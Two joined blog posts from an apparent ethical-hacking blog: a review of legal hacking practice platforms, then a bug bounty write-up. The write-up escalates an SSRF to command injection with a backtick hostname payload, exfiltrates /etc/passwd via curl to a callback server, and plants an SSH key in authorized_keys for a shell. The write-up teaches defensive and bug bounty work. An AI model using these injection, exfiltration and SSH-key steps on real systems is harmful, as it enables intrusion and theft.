Category: Hacking

I often get asked from many of my friends and colleagues about where should I start to learn to hack. My answer always includes a handful of hacking websites which I found very useful during my journey in this awesome industry. Today I will share with you the best hacking websites you should definitely use.

For those who stumbled upon this blog for the first time, it is dedicated to helping you learn and become a better ethical hacker, the topics cover web application hacking, penetration testing and bug bounty hunting.

Why are hacking websites important?

I always say that you can’t learn hacking without practice. Unfortunately, you can’t practice by hacking arbitrary websites because it is unethical and illegal, to say the least. You could develop your own web applications and then hack them, but that would take a lot of time and effort especially if you are not a developer. This is where hacking websites come into play. In fact, they offer a practical playground ready to be hacked by everyone. If you want to focus on learning a specific vulnerability, you can solve the corresponding challenges. Alternatively, if you want to hack a machine from the start and become root, you can play boot2root challenges. You can even participate in live Capture The Flag challenges, either alone or with a team, and play against other teams. This offers a tremendous opportunity for you not only to learn hacking but also to sharpen your skills and keep them up to date.

How to learn from hacking websites?

Some hacking websites offer challenges without solutions. You might think that this is not practical, but it’s the best way for you to learn. In fact, rushing into the solution without putting in enough effort will not benefit you in any way. When you take your time to understand the problem and solve it on your own, you will never forget it! Besides, real-life hacking involves so many rabbit holes, long hours trying to understand and exploit security vulnerabilities. So, you will be learning while preparing yourself for your future real targets.

Google Gruyere: A hacking website from Google

Google gruyere is a deliberately vulnerable web application that you can hack to learn about many security vulnerabilities. It is available online, which means that you don’t need any lab setup. It includes well-known issues like Cross-Site Scripting, Command Injection and CSRF. Additionally, you can also download the source code to inspect it and perform white-box testing.

Google gruyere is great for beginners because it explains each vulnerability at a time with a corresponding challenge. If you feel blocked, you can show the collapsed hints. Even though it also includes the solution, I don’t recommend you see it.

Pros

• Easy to use.
• Great explanations.
• Very useful for absolute beginners.

Cons

A limited number of vulnerabilities.

Vulnhub: The best hacking website for local boot2root machines

If you have a slow connection and you want to eliminate network latency when you are doing ethical hacking, then VulnHub is your friend. In fact, it is a hacking website which collects virtual machines that you can download one time and install locally on your host using virtualization software such as VirtualBox or VMWare. VulnHub offers so many machines in all difficulty levels. In such scenarios, you boot the virtual machine and your goal is to become root. This is known as a boot2root challenge.

For each machine, there is usually a publicly available solution, but I don’t recommend you read it until you exhaust all the ideas you have in mind. Unfortunately, there are no hints and no forum to exchange ideas between the community members.

Pros

• Offline hacking eliminates network latency.
• A large choice of Virtual Machines to choose from.

Cons

• There is no forum.
• Sometimes, you need to troubleshoot some networking issues when the VM is not reachable from your host machine.

Root me: My old favourite hacking website

Root-me.org is a mature hacking platform that you can use to practice ethical hacking. It is much more than just a simple hacking website. In fact, it offers challenges in many areas, such as web, cryptography, cracking, networking and more. Besides, it hosts CTF boot2root rooms that you can use to boot and hack a live target to become root. Some of these machines come from VulnHub, which makes it convenient for those who don’t like to set up a personal lab. Furthermore, it has a leaderboard and a strong and live community that you can interact with it using IRC or through the forum. Additionally, it offers professional services for companies which seek employees, hacking training, etc.

This ethical hacking platform provides solutions for the challenges it offers. However, you can’t see one unless you solve the corresponding challenge first. This is a great feature because it encourages you to make an effort on your own. To help you during this tough process, it provides you with related documentation that you can use to understand and solve the challenges on your own. Besides, you can find hints in the forum threads, post a message in the IRC chat, or even contact someone who has already solved the challenge.

pros

• Four languages: English, French, German and Spanish.
• Diversified challenges.
• Strong community.

cons

Honestly, I don’t have any. It’s a great platform!

hackthebox: The hacking website for OSCP

After I became top 100 on root-me and rooted a handful of CTF machines, I wanted to tackle challenges similar to the OSCP certification. I Google “OSCP like machines” and I find hackthebox.eu. They offer most of what root-me.org has, with some key differences.

Firstly, you can’t register unless you hack your way in. After you find the flag, you can log in to the platform. It’s not hard to solve that preliminary challenge; it’s just a way to prove that you deserve having an account on this hacking website.

Once I log in, I notice that the user interface is more elegant than the one of root-me.org. I know design taste is a matter of perspective and I don’t really judge a platform by its appearance, but this one just felt professional. On the menu on the left, you can download the VPN file, discover the challenges, the labs, the forum, etc.

Accessing this hacking website through the VPN

One of the key differences between root-me and hackthebox is VPN. In fact, to hack the available machines on the latter, you download your connection pack. Then, you connect to the infrastructure with OpenVPN, an open-source software that allows you to connect using VPN. Don’t get scared if this seems new to you; everything is explained on the platform and you just have to follow the steps.

The challenges and boot2root machines

On the one hand, hackthebox offers challenges the same way root-me does, but the number is still way lower. You don’t need a VPN to access the challenges.

On the other hand, hackthebox offers a wide range of boot2root machines. If you want to prepare for your OSCP certification, this is where you should spend most of your time.

In the free plan, you have access to the new ones. Once they retire, you need a paid plan to be able to hack them. As I mentioned earlier, you need to set up a VPN connection to reach them.

The labs

In addition to the awesome boot2root machines, hackthebox offers many hacking labs. These are a couple of machines that compose a full infrastructure. Few of them are accessible directly through the VPN, but most of them require you to obtain a foothold on the infrastructure.

Some of these labs are Active Directory infrastructures developed by hackthebox itself, others are provided by companies which seek ethical hackers to join them. You can find all of them on the menu on the left.

The community

You can join the community and interact with its members through many communication channels, such as the forum, the Discord server and the Mattermost space. You can also send private messages to members and broadcast messages using the shoutbox.

All these communication channels are available on the left menu.

Pros

• Great quality machines, ideal for OSCP certification preparation.
• Diversified challenges.

Cons

I honestly don’t see any!

TryHackMe: A new rising hacking website star

This hacking platform is recent. However, it contains exhaustive hacking material in new forms I haven’t seen in any other hacking website.

Accessing TryHackMe challenges

As it is the case with hackthebox, this platform also provides a VPN package that you can use to access the hacking challenges. However, only UDP is supported. If you are in a network which blocks UDP, you can’t currently bypass it as you would do with hackthebox.

Hacktivities

These are corners which focus on teaching one thing. For example, if you want to learn the basics of penetration testing, there is a room for that. The same thing for learning how to use Linux and the list goes on. All you have to do is search for the room you want using a filtering system, then enroll and start learning. Some rooms need a paid subscription.

Learning paths

If you are a total beginner in a subject, the learning paths help you cover the basics. These are paid by definition.

King of the Hill

These are CTF challenges like you would see in a typical boot2root scenario, with a key twist! In fact, you can put your name in the file under /root/king.txt to become the king and start gaining points. The players not only exploit the vulnerabilities within the machine, but they also strive to earn the highest score by staying king as long as possible.

The community

You can interact with the community through many communication channels, such as Discord, Twitter, Direct messages, etc.

Pros

• The rooms and the learning paths are great to learn new subjects.
• King of the Hill are fun CTFs.
• The community is live.

Cons

• The VPN package doesn’t support TCP.

hacker101: The hacking website for bug bounty hunters

I’ve talked this hacking website provides on previous episodes, such as when I talked about my bug bounty methodology. This hacking website provides a solid playground for bug bounty hunters with diversified challenges that will twist your mind. They are designed to mimic the real bugs you would find during bug bounty hunting. Besides, you collect points for each challenge you solve, which allows you to get an invite from a private program on HackerOne. However, it doesn’t only provide hacking challenges. In my opinion, there are two other resources you can learn from besides the hacking challenges.

The first one is the Discord server where you can connect and engage with the bug bounty community members.

The second resource I want to draw your attention to is the introductory videos that explain many subjects that relate to bug bounty hunting. Things like web vulnerabilities and mobile hacking.

Pros

• Great videos resources for future bug bounty hunters
• The challenges are unique and similar to what you would find during bug bounty hunting.
• Vibrant bug bounty community in the Discord server.

Cons

The hacking content and the features are still quite limited compared to other hacking platforms.

Which one of these hacking websites to choose?

You might have started to feel overwhelmed with all these hacking websites and platforms. I hear you wondering where should I start? And do I have to subscribe and use all of them?

The answer is no! While each hacking website and platform brings its unique features and user experience, all of them share the same core building blocks, which are hands-on challenges. As the number of such resources contains to grow, you just have to choose one or two which suit your taste and needs. Occasionally, you may experiment with new rising hacking websites and platforms, which might replace your current ones.

I started my hacking journey when the major hacking websites I had were VulnHub and Root-me around. Once I discovered hackthebox, I got addicted to their machines, especially since I was preparing my OSCP certification. Lately, I came across tryhackme, which offered a great gamification experience on top of the practical hacking content.

Conclusion

In this article, I tried to collect the best hacking websites and platforms that will surely help you in your hacking career. Whether you are an absolute beginner or an advanced ethical hacker, I’m sure you will find a match.

However, this is not a complete list. There are other hacking websites like OWASP WebGoat and OWASP JuiceShop, which I have used as a hacking lab for the OWASP Top 10 training. Then, there is Portswigger Academy which I already covered in a previous episode. And finally, there is the classic CTFtime, which is dedicated to Capture the Flag events.

Hello ethical hackers and bug bounty hunters! Welcome to this bug bounty write-up where I show you how I found a Server-Side Request Forgery vulnerability (SSRF). Then, I will explain how I was able to escalate it to obtain a Remote Code Execution (RCE). Finally, you will see how it is possible to gain a full SSH shell on the vulnerable server.

If all this seems intimidating for you, let me tell you that you shouldn’t be; just make sure you stick with me until the end. I promise you are going to learn many things today!

What app is this bug bounty write-up targeting?

Before diving into the details, let’s understand what the application does.

Simply put, the web application I hacked is a file-sharing system that allows users to securely exchange files. It also has an administrative panel dedicated to the administrators for management purposes. They can create users, configure internal servers and networks, etc.

To honour the responsible disclosure policy, I will not tell the name of this application. However, this does not affect what you will be learning. You can definitely apply these tips and tricks on the bug bounty programs or the penetration testing projects you are working on.

Bug bounty write-up phase 1: Enumeration

The first phase of any security testing is Enumeration. In my bug bounty methodology, I explained what are the key questions you need to answer during this phase.

In the context of this application, I focused on the administration panel since it contained many interesting features. One of them is the possibility to configure a migration server. This feature has a multi-stage wizard.

Whenever I see a complex feature, I tend to put it at the top of the list since the developers will likely make more mistakes. And this particular case was no different!

In fact, during one of the many configuration steps, the application asks for the IP address or the hostname of the migration server. For me, I started hearing inner-voices screaming: SSRF! SSRF! SSRF!

Bug bounty write-up phase 2: Exploiting the SSRF

Wait…What is SSRF in the first place?

SSRF stands for Server-Side Request Forgery. It is a security vulnerability which happens if you can meet two conditions:

1. The application initiates a request to a target server.
2. You control part or all of the target server through user input.

SSRF can be handy to pivot inside the IT infrastructure of your target. This is possible because the vulnerable server generally runs next to neighbour systems which are not directly accessible. You can see this in action when I demonstrate how I accessed the APK file during the Hackerone H1-2006 CTF challenge write-up.

Exploiting the SSRF

In the case of this web application, I simply put my web server’s hostname in the migration server’s input field. Upon hitting the Next button, I received an HTTP callback. This means that the application takes the hostname input and initiates an HTTP request to a server of my choice.

What is the impact?

Receiving a callback is not necessarily a security issue unless the server discloses sensitive data in the request. You must test if you can reach internal assets. In other words, you should be able to access services which are not directly exposed. Unfortunately, many bug bounty hunters fall for this mistake and their reports get closed as Not Applicable to Informative.

In the case of this web application, I get different error messages depending on whether there is a service running or not, but that’s all about it! I can’t interact with those services. Therefore, this SSRF is not impactful enough.

But wait! Maybe I can run arbitrary commands and exfiltrate the results in the callback.

Escalating to Remote Code Execution (RCE)

This time, instead of using my domain as a callback, I injected an operating system (OS) command as part of the callback subdomain. Technically, I used the payload “whoami.mycallback.server. Consequently, I got an HTTP request callback to uzer.mycallback.server !

If you don’t understand the above payload, here is what’s happening:

1. The whoami runs the command whoami. This is possible thanks to the back-ticks around it. In this case, the command returns uzer .
2. The server sends an HTTP callback request to my server while disclosing the result of the OS command in the subdomain part.

This is clear proof that I can successfully run OS commands on the vulnerable server, which is all good, but can I run arbitrary commands?

Bug bounty write-up bonus: Getting a full shell

While the proof-of-concept (POC) that I have so far demonstrates impact, I wanted to be sure I’m getting the full bug bounty. To do that, I needed to prove that I can run arbitrary commands, not just single-word commands like whoami.

To achieve this, I needed to read and write files. You will understand why shortly, but for now, let’s see how we can fulfil those two requirements.

Reading internal files

Instead of using whomai, I run curl -F ‘@/etc/passwd mycallback.server’.mycallback.server. Therefore, I exfiltrated the content of the file /etc/passwd in the POST data which I receive back on mycallback.server.

Although I was using a mal-formatted hostname syntax in my payload, I still could run the OS command since the server evaluates it before anything else.

Writing to internal files

To demonstrate the ability to create and edit the server’s files, I run echo test | tee /tmp/POC. Then, I fetched its content using the same technique I used to read the /etc/passwd file.

Finally, getting the SSH shell

Because the server is running a publicly accessible SSH server, what if I could log into it without any need for a password?

To achieve this, the steps are as follow:

1. Generate a key pair using the command ssh-keygen on my attacking machine.
2. Append the public key to the file /home/uzer/.ssh/authorized_keys on the vulnerable server using the same technique I used earlier to write the file /tmp/POC.
3. Log into the SSH server using my private key and the user uzer using ssh -i private.key uzer@vulnerable.server .

As a result of this clear and precise impact, the team quickly triaged my report and awarded me with the highest bounty.

Conclusion

Chaining vulnerabilities can be devastating. In this bug bounty write-up, you learned how to combine both SSRF and Command injection to achieve Remote Code Execution on the vulnerable server. Besides, you learned how to gain a stable shell by leveraging the exposed SSH server. Finally, you learned that it’s important to demonstrate a clear impact if you want to receive the highest bounty.

I hope you enjoyed reading this article as much as I enjoyed writing it. Until the next episode, stay curious, keep learning and go find some bugs.